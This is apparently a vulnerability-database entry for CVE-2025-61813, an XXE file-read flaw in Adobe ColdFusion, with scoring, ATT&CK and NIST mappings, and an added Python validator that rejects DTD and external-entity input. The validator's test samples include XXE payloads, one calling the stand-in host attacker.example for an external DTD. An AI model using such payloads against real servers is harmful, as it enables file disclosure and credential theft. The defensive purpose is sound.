Cyber Resilience

CVE-2025-61813

Severity: High (updated)

Published: 10 December 2025
Modified: 01 June 2026
KEV Added: not listed
Patch: see Adobe bulletin APSB25-105 (linked below)
CVSS Score v3.1: 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:L)
EPSS Score: 0.0004 (13.3th percentile)
Risk Priority: 16 (weighting: 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2025-61813 is a high-severity Improper Restriction of XML External Entity Reference (CWE-611) vulnerability in Adobe ColdFusion. Its CVSS base score is 8.2 (High).

Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE sits at EPSS percentile 13.3 for exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 CM-6 (Configuration Settings) and SI-10 (Information Input Validation).

Deeper analysis

CVE-2025-61813 is an Improper Restriction of XML External Entity Reference (XXE) vulnerability, classified under CWE-611, affecting Adobe ColdFusion versions 2025.4, 2023.16, 2021.22, and earlier. This flaw enables arbitrary file system reads, allowing attackers to access sensitive files on the server. It carries a CVSS v3.1 base score of 8.2 (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:L), reflecting high confidentiality impact with low attack complexity and changed scope.

An unauthenticated attacker can exploit this vulnerability remotely with low complexity by tricking a user into interacting with malicious XML input, such as processing a crafted document or file upload. Upon successful exploitation, the attacker gains the ability to read arbitrary files on the server, potentially exposing configuration data, credentials, or other sensitive information, though integrity and availability impacts remain low.

Adobe Security Bulletin APSB25-105, available at https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html, details patches and recommended mitigations for affected ColdFusion versions. Security practitioners should apply these updates promptly and review server configurations for XML processing to prevent exploitation.


Vulnerability details

ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files on the server. Exploitation of this issue requires user interaction and scope is changed.


Related Threats

MITRE ATT&CK Enterprise Techniques (AI-assigned mapping)

T1190 Exploit Public-Facing Application (Initial Access): Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.

T1005 Data from Local System (Collection): Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.

Why these techniques?

T1190: XXE in public-facing Adobe ColdFusion enables exploitation of remote services. T1005: Vulnerability directly allows arbitrary local file system reads.

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2025-49535: same product, Adobe ColdFusion
CVE-2025-61821: same product, Adobe ColdFusion
CVE-2026-27305: same product, Adobe ColdFusion
CVE-2025-54261: same product, Adobe ColdFusion
CVE-2026-27304: same product, Adobe ColdFusion
CVE-2025-61809: same product, Adobe ColdFusion
CVE-2025-61810: same product, Adobe ColdFusion
CVE-2025-61811: same product, Adobe ColdFusion
CVE-2026-27282: same product, Adobe ColdFusion
CVE-2026-34619: same product, Adobe ColdFusion

Affected Assets

Vendor: adobe
Product: coldfusion
Versions: 2021, 2023, 2025

Mitigating Controls (NIST 800-53 r5, AI-assigned mapping)

Prevent (patching): Directly remediates the XXE flaw in ColdFusion via timely patching as recommended in Adobe bulletin APSB25-105, preventing arbitrary file reads.

Prevent (SI-10, Information Input Validation): Validates untrusted XML inputs processed by ColdFusion to block external entity references that enable file system disclosure.

Prevent (CM-6, Configuration Settings): Enforces secure configuration settings for ColdFusion's XML parser to disable external entity processing, mitigating XXE exploitation.
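Added example of the SI-10 input-validation control described above; this is illustrative code, not Adobe's or the ColdFusion product's. It rejects DTD and XInclude constructs in untrusted XML before any parser sees them, and decodes the input first so a UTF-16 document cannot slip a DOCTYPE past a byte-level match. The sample documents and the placeholder hostname and path are constructed.

```python
"""Pre-parse validation of untrusted XML against XXE (CWE-611)."""
import re
import xml.etree.ElementTree as ET

# A DOCTYPE is the only place an external entity can be declared, either
# inline or via an external DTD, so untrusted input never needs one.
_DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# Entity (or parameter entity) declarations that point outside the document.
_EXT_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?[\w.:-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# XInclude is a second route to server-side file reads in XInclude-aware parsers.
_XINCLUDE_NS_RE = re.compile(r"http://www\.w3\.org/2001/XInclude")


def check_untrusted_xml(text: str) -> list:
    """Return the names of dangerous constructs found in decoded XML text."""
    findings = []
    if _DOCTYPE_RE.search(text):
        findings.append("doctype")
    if _EXT_ENTITY_RE.search(text):
        findings.append("external-entity")
    if _XINCLUDE_NS_RE.search(text):
        findings.append("xinclude")
    return findings


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Decode, reject dangerous constructs, then parse with the stdlib parser."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):   # UTF-16 BOM
        text = data.decode("utf-16")
    else:
        text = data.decode("utf-8")
    findings = check_untrusted_xml(text)
    if findings:
        raise ValueError("rejected untrusted XML: " + ", ".join(findings))
    return ET.fromstring(text)


# Constructed sample inputs (not captured traffic); hostname and path are placeholders.
BENIGN = b'<order id="42"><item sku="A-1">2</item></order>'
XXE_INTERNAL = (b'<!DOCTYPE d [<!ENTITY e SYSTEM "file:///placeholder/path">]>'
                b'<order>&e;</order>')
XXE_EXT_DTD = b'<!DOCTYPE d SYSTEM "http://attacker.example/x.dtd"><order/>'
XXE_UTF16 = XXE_INTERNAL.decode("utf-8").encode("utf-16")  # BOM + UTF-16LE

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN), ("internal", XXE_INTERNAL),
                          ("external-dtd", XXE_EXT_DTD), ("utf16", XXE_UTF16)]:
        try:
            print(label, "parsed root:", parse_untrusted_xml(sample).tag)
        except ValueError as exc:
            print(label, exc)
```

This check is defence in depth alongside CM-6: the parser itself must still be configured to disable DTD and external entity processing.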
